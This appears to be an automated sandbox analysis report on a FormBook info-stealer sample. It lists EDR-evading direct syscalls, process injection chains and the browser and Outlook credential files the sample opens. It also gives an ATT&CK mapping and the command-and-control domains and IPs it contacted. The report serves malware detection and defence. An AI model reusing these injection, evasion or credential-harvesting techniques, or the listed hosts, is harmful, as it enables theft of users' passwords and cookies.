                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037BE872 mov eax, dword ptr fs:[00000030h]1_2_037BE872
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037BE872 mov eax, dword ptr fs:[00000030h]1_2_037BE872
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037C6870 mov eax, dword ptr fs:[00000030h]1_2_037C6870
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037C6870 mov eax, dword ptr fs:[00000030h]1_2_037C6870
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03760854 mov eax, dword ptr fs:[00000030h]1_2_03760854
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03734859 mov eax, dword ptr fs:[00000030h]1_2_03734859
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03734859 mov eax, dword ptr fs:[00000030h]1_2_03734859
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03742840 mov ecx, dword ptr fs:[00000030h]1_2_03742840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03752835 mov eax, dword ptr fs:[00000030h]1_2_03752835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03752835 mov eax, dword ptr fs:[00000030h]1_2_03752835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03752835 mov eax, dword ptr fs:[00000030h]1_2_03752835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03752835 mov ecx, dword ptr fs:[00000030h]1_2_03752835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03752835 mov eax, dword ptr fs:[00000030h]1_2_03752835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03752835 mov eax, dword ptr fs:[00000030h]1_2_03752835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038008C0 mov eax, dword ptr fs:[00000030h]1_2_038008C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376A830 mov eax, dword ptr fs:[00000030h]1_2_0376A830
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037D483A mov eax, dword ptr fs:[00000030h]1_2_037D483A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037D483A mov eax, dword ptr fs:[00000030h]1_2_037D483A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037BC810 mov eax, dword ptr fs:[00000030h]1_2_037BC810
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376C8F9 mov eax, dword ptr fs:[00000030h]1_2_0376C8F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376C8F9 mov eax, dword ptr fs:[00000030h]1_2_0376C8F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037FA8E4 mov eax, dword ptr fs:[00000030h]1_2_037FA8E4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0375E8C0 mov eax, dword ptr fs:[00000030h]1_2_0375E8C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037BC89D mov eax, dword ptr fs:[00000030h]1_2_037BC89D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03730887 mov eax, dword ptr fs:[00000030h]1_2_03730887
                Source: C:\Users\user\Desktop\IBbGrGi4A7.exeCode function: 0_2_003680A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,0_2_003680A9
                Source: C:\Users\user\Desktop\IBbGrGi4A7.exeCode function: 0_2_0033A124 SetUnhandledExceptionFilter,0_2_0033A124
                Source: C:\Users\user\Desktop\IBbGrGi4A7.exeCode function: 0_2_0033A155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0033A155

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Found direct / indirect Syscall (likely to bypass EDR)
                Source: C:\Program Files (x86)\zrqihSMwRJsYwIJMqTIvnymdjFXqbSAGCWhEiUAhds\L0o39BrLvRQHRGJJTVHX4K.exeNtQueryVolumeInformationFile: Direct from: 0x776D2F2CJump to behavior
                Source: C:\Program Files (x86)\zrqihSMwRJsYwIJMqTIvnymdjFXqbSAGCWhEiUAhds\L0o39BrLvRQHRGJJTVHX4K.exeNtQuerySystemInformation: Direct from: 0x776D48CCJump to behavior
                Source: C:\Program Files (x86)\zrqihSMwRJsYwIJMqTIvnymdjFXqbSAGCWhEiUAhds\L0o39BrLvRQHRGJJTVHX4K.exeNtAllocateVirtualMemory: Direct from: 0x776D48ECJump to behavior
                Source: C:\Program Files (x86)\zrqihSMwRJsYwIJMqTIvnymdjFXqbSAGCWhEiUAhds\L0o39BrLvRQHRGJJTVHX4K.exeNtOpenSection: Direct from: 0x776D2E0CJump to behavior
                Source: C:\Program Files (x86)\zrqihSMwRJsYwIJMqTIvnymdjFXqbSAGCWhEiUAhds\L0o39BrLvRQHRGJJTVHX4K.exeNtDeviceIoControlFile: Direct from: 0x776D2AECJump to behavior
                Source: C:\Program Files (x86)\zrqihSMwRJsYwIJMqTIvnymdjFXqbSAGCWhEiUAhds\L0o39BrLvRQHRGJJTVHX4K.exeNtAllocateVirtualMemory: Direct from: 0x776D2BECJump to behavior
                Source: C:\Program Files (x86)\zrqihSMwRJsYwIJMqTIvnymdjFXqbSAGCWhEiUAhds\L0o39BrLvRQHRGJJTVHX4K.exeNtQueryInformationProcess: Direct from: 0x776D2C26Jump to behavior
                Source: C:\Program Files (x86)\zrqihSMwRJsYwIJMqTIvnymdjFXqbSAGCWhEiUAhds\L0o39BrLvRQHRGJJTVHX4K.exeNtResumeThread: Direct from: 0x776D2FBCJump to behavior
                Source: C:\Program Files (x86)\zrqihSMwRJsYwIJMqTIvnymdjFXqbSAGCWhEiUAhds\L0o39BrLvRQHRGJJTVHX4K.exeNtWriteVirtualMemory: Direct from: 0x776D490CJump to behavior
                Source: C:\Program Files (x86)\zrqihSMwRJsYwIJMqTIvnymdjFXqbSAGCWhEiUAhds\L0o39BrLvRQHRGJJTVHX4K.exeNtCreateUserProcess: Direct from: 0x776D371CJump to behavior
                Source: C:\Program Files (x86)\zrqihSMwRJsYwIJMqTIvnymdjFXqbSAGCWhEiUAhds\L0o39BrLvRQHRGJJTVHX4K.exeNtClose: Direct from: 0x776D2B6C
                Source: C:\Program Files (x86)\zrqihSMwRJsYwIJMqTIvnymdjFXqbSAGCWhEiUAhds\L0o39BrLvRQHRGJJTVHX4K.exeNtAllocateVirtualMemory: Direct from: 0x776D3C9CJump to behavior
                Source: C:\Program Files (x86)\zrqihSMwRJsYwIJMqTIvnymdjFXqbSAGCWhEiUAhds\L0o39BrLvRQHRGJJTVHX4K.exeNtSetInformationThread: Direct from: 0x776C63F9Jump to behavior
                Source: C:\Program Files (x86)\zrqihSMwRJsYwIJMqTIvnymdjFXqbSAGCWhEiUAhds\L0o39BrLvRQHRGJJTVHX4K.exeNtQueryAttributesFile: Direct from: 0x776D2E6CJump to behavior
                Source: C:\Program Files (x86)\zrqihSMwRJsYwIJMqTIvnymdjFXqbSAGCWhEiUAhds\L0o39BrLvRQHRGJJTVHX4K.exeNtSetInformationThread: Direct from: 0x776D2B4CJump to behavior
                Source: C:\Program Files (x86)\zrqihSMwRJsYwIJMqTIvnymdjFXqbSAGCWhEiUAhds\L0o39BrLvRQHRGJJTVHX4K.exeNtReadVirtualMemory: Direct from: 0x776D2E8CJump to behavior
                Source: C:\Program Files (x86)\zrqihSMwRJsYwIJMqTIvnymdjFXqbSAGCWhEiUAhds\L0o39BrLvRQHRGJJTVHX4K.exeNtCreateKey: Direct from: 0x776D2C6CJump to behavior
                Source: C:\Program Files (x86)\zrqihSMwRJsYwIJMqTIvnymdjFXqbSAGCWhEiUAhds\L0o39BrLvRQHRGJJTVHX4K.exeNtResumeThread: Direct from: 0x776D36ACJump to behavior
                Source: C:\Program Files (x86)\zrqihSMwRJsYwIJMqTIvnymdjFXqbSAGCWhEiUAhds\L0o39BrLvRQHRGJJTVHX4K.exeNtMapViewOfSection: Direct from: 0x776D2D1CJump to behavior
                Source: C:\Program Files (x86)\zrqihSMwRJsYwIJMqTIvnymdjFXqbSAGCWhEiUAhds\L0o39BrLvRQHRGJJTVHX4K.exeNtWriteVirtualMemory: Direct from: 0x776D2E3CJump to behavior
                Source: C:\Program Files (x86)\zrqihSMwRJsYwIJMqTIvnymdjFXqbSAGCWhEiUAhds\L0o39BrLvRQHRGJJTVHX4K.exeNtCreateMutant: Direct from: 0x776D35CCJump to behavior
                Source: C:\Program Files (x86)\zrqihSMwRJsYwIJMqTIvnymdjFXqbSAGCWhEiUAhds\L0o39BrLvRQHRGJJTVHX4K.exeNtAllocateVirtualMemory: Direct from: 0x776D2BFCJump to behavior
                Source: C:\Program Files (x86)\zrqihSMwRJsYwIJMqTIvnymdjFXqbSAGCWhEiUAhds\L0o39BrLvRQHRGJJTVHX4K.exeNtDelayExecution: Direct from: 0x776D2DDCJump to behavior
                Source: C:\Program Files (x86)\zrqihSMwRJsYwIJMqTIvnymdjFXqbSAGCWhEiUAhds\L0o39BrLvRQHRGJJTVHX4K.exeNtQuerySystemInformation: Direct from: 0x776D2DFCJump to behavior
                Source: C:\Program Files (x86)\zrqihSMwRJsYwIJMqTIvnymdjFXqbSAGCWhEiUAhds\L0o39BrLvRQHRGJJTVHX4K.exeNtReadFile: Direct from: 0x776D2ADCJump to behavior
                Source: C:\Program Files (x86)\zrqihSMwRJsYwIJMqTIvnymdjFXqbSAGCWhEiUAhds\L0o39BrLvRQHRGJJTVHX4K.exeNtTerminateThread: Direct from: 0x776D2FCCJump to behavior
                Source: C:\Program Files (x86)\zrqihSMwRJsYwIJMqTIvnymdjFXqbSAGCWhEiUAhds\L0o39BrLvRQHRGJJTVHX4K.exeNtQueryInformationToken: Direct from: 0x776D2CACJump to behavior
                Source: C:\Program Files (x86)\zrqihSMwRJsYwIJMqTIvnymdjFXqbSAGCWhEiUAhds\L0o39BrLvRQHRGJJTVHX4K.exeNtCreateFile: Direct from: 0x776D2FECJump to behavior
                Source: C:\Program Files (x86)\zrqihSMwRJsYwIJMqTIvnymdjFXqbSAGCWhEiUAhds\L0o39BrLvRQHRGJJTVHX4K.exeNtOpenFile: Direct from: 0x776D2DCCJump to behavior
                Source: C:\Program Files (x86)\zrqihSMwRJsYwIJMqTIvnymdjFXqbSAGCWhEiUAhds\L0o39BrLvRQHRGJJTVHX4K.exeNtOpenKeyEx: Direct from: 0x776D2B9CJump to behavior
                Source: C:\Program Files (x86)\zrqihSMwRJsYwIJMqTIvnymdjFXqbSAGCWhEiUAhds\L0o39BrLvRQHRGJJTVHX4K.exeNtNotifyChangeKey: Direct from: 0x776D3C2CJump to behavior
                Source: C:\Program Files (x86)\zrqihSMwRJsYwIJMqTIvnymdjFXqbSAGCWhEiUAhds\L0o39BrLvRQHRGJJTVHX4K.exeNtSetInformationProcess: Direct from: 0x776D2C5CJump to behavior
                Source: C:\Program Files (x86)\zrqihSMwRJsYwIJMqTIvnymdjFXqbSAGCWhEiUAhds\L0o39BrLvRQHRGJJTVHX4K.exeNtProtectVirtualMemory: Direct from: 0x776D2F9CJump to behavior
                Maps a DLL or memory area into another process
                Source: C:\Users\user\Desktop\IBbGrGi4A7.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\zrqihSMwRJsYwIJMqTIvnymdjFXqbSAGCWhEiUAhds\L0o39BrLvRQHRGJJTVHX4K.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\takeown.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\takeown.exeSection loaded: NULL target: C:\Program Files (x86)\zrqihSMwRJsYwIJMqTIvnymdjFXqbSAGCWhEiUAhds\L0o39BrLvRQHRGJJTVHX4K.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\takeown.exeSection loaded: NULL target: C:\Program Files (x86)\zrqihSMwRJsYwIJMqTIvnymdjFXqbSAGCWhEiUAhds\L0o39BrLvRQHRGJJTVHX4K.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\takeown.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\takeown.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Modifies the context of a thread in another process (thread injection)
                Source: C:\Windows\SysWOW64\takeown.exeThread register set: target process: 6020Jump to behavior
                Queues an APC in another process (thread injection)
                Source: C:\Windows\SysWOW64\takeown.exeThread APC queued: target process: C:\Program Files (x86)\zrqihSMwRJsYwIJMqTIvnymdjFXqbSAGCWhEiUAhds\L0o39BrLvRQHRGJJTVHX4K.exeJump to behavior
                Writes to foreign memory regions
                Source: C:\Users\user\Desktop\IBbGrGi4A7.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2D5A008Jump to behavior
                Source: C:\Users\user\Desktop\IBbGrGi4A7.exeCode function: 0_2_003687B1 LogonUserW,0_2_003687B1
                Source: C:\Users\user\Desktop\IBbGrGi4A7.exeCode function: 0_2_00313B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00313B3A
                Source: C:\Users\user\Desktop\IBbGrGi4A7.exeCode function: 0_2_003148D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_003148D7
                Source: C:\Users\user\Desktop\IBbGrGi4A7.exeCode function: 0_2_00374C27 mouse_event,0_2_00374C27
                Source: C:\Users\user\Desktop\IBbGrGi4A7.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\IBbGrGi4A7.exe"Jump to behavior
                Source: C:\Program Files (x86)\zrqihSMwRJsYwIJMqTIvnymdjFXqbSAGCWhEiUAhds\L0o39BrLvRQHRGJJTVHX4K.exeProcess created: C:\Windows\SysWOW64\takeown.exe "C:\Windows\SysWOW64\takeown.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\takeown.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\IBbGrGi4A7.exeCode function: 0_2_00367CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00367CAF
                Source: C:\Users\user\Desktop\IBbGrGi4A7.exeCode function: 0_2_0036874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_0036874B
                Source: IBbGrGi4A7.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                Source: L0o39BrLvRQHRGJJTVHX4K.exe, 00000002.00000000.985481230.00000000016B0000.00000002.00000001.00040000.00000000.sdmp, L0o39BrLvRQHRGJJTVHX4K.exe, 00000002.00000002.3329989125.00000000016B0000.00000002.00000001.00040000.00000000.sdmp, L0o39BrLvRQHRGJJTVHX4K.exe, 00000005.00000002.3330559407.0000000000F70000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
                Source: IBbGrGi4A7.exe, L0o39BrLvRQHRGJJTVHX4K.exe, 00000002.00000000.985481230.00000000016B0000.00000002.00000001.00040000.00000000.sdmp, L0o39BrLvRQHRGJJTVHX4K.exe, 00000002.00000002.3329989125.00000000016B0000.00000002.00000001.00040000.00000000.sdmp, L0o39BrLvRQHRGJJTVHX4K.exe, 00000005.00000002.3330559407.0000000000F70000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: L0o39BrLvRQHRGJJTVHX4K.exe, 00000002.00000000.985481230.00000000016B0000.00000002.00000001.00040000.00000000.sdmp, L0o39BrLvRQHRGJJTVHX4K.exe, 00000002.00000002.3329989125.00000000016B0000.00000002.00000001.00040000.00000000.sdmp, L0o39BrLvRQHRGJJTVHX4K.exe, 00000005.00000002.3330559407.0000000000F70000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: L0o39BrLvRQHRGJJTVHX4K.exe, 00000002.00000000.985481230.00000000016B0000.00000002.00000001.00040000.00000000.sdmp, L0o39BrLvRQHRGJJTVHX4K.exe, 00000002.00000002.3329989125.00000000016B0000.00000002.00000001.00040000.00000000.sdmp, L0o39BrLvRQHRGJJTVHX4K.exe, 00000005.00000002.3330559407.0000000000F70000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\IBbGrGi4A7.exeCode function: 0_2_0033862B cpuid 0_2_0033862B
                Source: C:\Users\user\Desktop\IBbGrGi4A7.exeCode function: 0_2_00344E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00344E87
                Source: C:\Users\user\Desktop\IBbGrGi4A7.exeCode function: 0_2_00351E06 GetUserNameW,0_2_00351E06
                Source: C:\Users\user\Desktop\IBbGrGi4A7.exeCode function: 0_2_00343F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_00343F3A
                Source: C:\Users\user\Desktop\IBbGrGi4A7.exeCode function: 0_2_003149A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_003149A0

                Stealing of Sensitive Information

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000003.00000002.3330191796.0000000002CC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3330168283.0000000000DD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1066377922.0000000003560000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.3328376409.0000000002570000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1066813135.0000000005C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.3330359905.0000000004AB0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1066016609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.3330036627.0000000002B20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\SysWOW64\takeown.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\takeown.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\SysWOW64\takeown.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\takeown.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\takeown.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\takeown.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\takeown.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\takeown.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Windows\SysWOW64\takeown.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
                Source: IBbGrGi4A7.exeBinary or memory string: WIN_81
                Source: IBbGrGi4A7.exeBinary or memory string: WIN_XP
                Source: IBbGrGi4A7.exeBinary or memory string: WIN_XPe
                Source: IBbGrGi4A7.exeBinary or memory string: WIN_VISTA
                Source: IBbGrGi4A7.exeBinary or memory string: WIN_7
                Source: IBbGrGi4A7.exeBinary or memory string: WIN_8
                Source: IBbGrGi4A7.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

                Remote Access Functionality

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000003.00000002.3330191796.0000000002CC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3330168283.0000000000DD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1066377922.0000000003560000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.3328376409.0000000002570000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1066813135.0000000005C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.3330359905.0000000004AB0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1066016609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.3330036627.0000000002B20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\IBbGrGi4A7.exeCode function: 0_2_00386283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_00386283
                Source: C:\Users\user\Desktop\IBbGrGi4A7.exeCode function: 0_2_00386747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00386747

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire Infrastructure2
                Valid Accounts                		1
                Native API                		1
                DLL Side-Loading                		1
                Exploitation for Privilege Escalation                		1
                Disable or Modify Tools                		1
                OS Credential Dumping                		2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		4
                Ingress Tool Transfer                		Exfiltration Over Other Network Medium1
                System Shutdown/Reboot
                CredentialsDomainsDefault AccountsScheduled Task/Job2
                Valid Accounts                		1
                Abuse Elevation Control Mechanism                		1
                Deobfuscate/Decode Files or Information                		21
                Input Capture                		1
                Account Discovery                		Remote Desktop Protocol1
                Data from Local System                		1
                Encrypted Channel                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                DLL Side-Loading                		1
                Abuse Elevation Control Mechanism                		Security Account Manager2
                File and Directory Discovery                		SMB/Windows Admin Shares1
                Email Collection                		4
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
                Valid Accounts                		3
                Obfuscated Files or Information                		NTDS116
                System Information Discovery                		Distributed Component Object Model21
                Input Capture                		4
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
                Access Token Manipulation                		1
                DLL Side-Loading                		LSA Secrets151
                Security Software Discovery                		SSH3
                Clipboard Data                		Fallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts412
                Process Injection                		2
                Valid Accounts                		Cached Domain Credentials2
                Virtualization/Sandbox Evasion                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
                Virtualization/Sandbox Evasion                		DCSync3
                Process Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
                Access Token Manipulation                		Proc Filesystem11
                Application Window Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt412
                Process Injection                		/etc/passwd and /etc/shadow1
                System Owner/User Discovery                		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1634593 Sample: IBbGrGi4A7.exe Startdate: 11/03/2025 Architecture: WINDOWS Score: 100 28 www.dolfisstillspinnin.xyz 2->28 30 www.sislieskort.xyz 2->30 32 10 other IPs or domains 2->32 42 Antivirus detection for URL or domain 2->42 44 Antivirus / Scanner detection for submitted sample 2->44 46 Multi AV Scanner detection for submitted file 2->46 50 3 other signatures 2->50 10 IBbGrGi4A7.exe 2 2->10         started        signatures3 48 Performs DNS queries to domains with low reputation 30->48 process4 signatures5 62 Binary is likely a compiled AutoIt script file 10->62 64 Writes to foreign memory regions 10->64 66 Maps a DLL or memory area into another process 10->66 68 Switches to a custom stack to bypass stack traces 10->68 13 svchost.exe 10->13         started        process6 signatures7 70 Maps a DLL or memory area into another process 13->70 16 L0o39BrLvRQHRGJJTVHX4K.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 takeown.exe 13 16->19         started        process10 signatures11 52 Tries to steal Mail credentials (via file / registry access) 19->52 54 Tries to harvest and steal browser information (history, passwords, etc) 19->54 56 Modifies the context of a thread in another process (thread injection) 19->56 58 3 other signatures 19->58 22 L0o39BrLvRQHRGJJTVHX4K.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 kakeksakti12.cfd 198.252.98.84, 49713, 49714, 49715 HAWKHOSTCA Canada 22->34 36 nan21.net 93.113.54.70, 49693, 49694, 49695 GTSCEGTSCentralEuropeAntelGermanyCZ Romania 22->36 38 5 other IPs or domains 22->38 60 Found direct / indirect Syscall (likely to bypass EDR) 22->60 signatures14

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.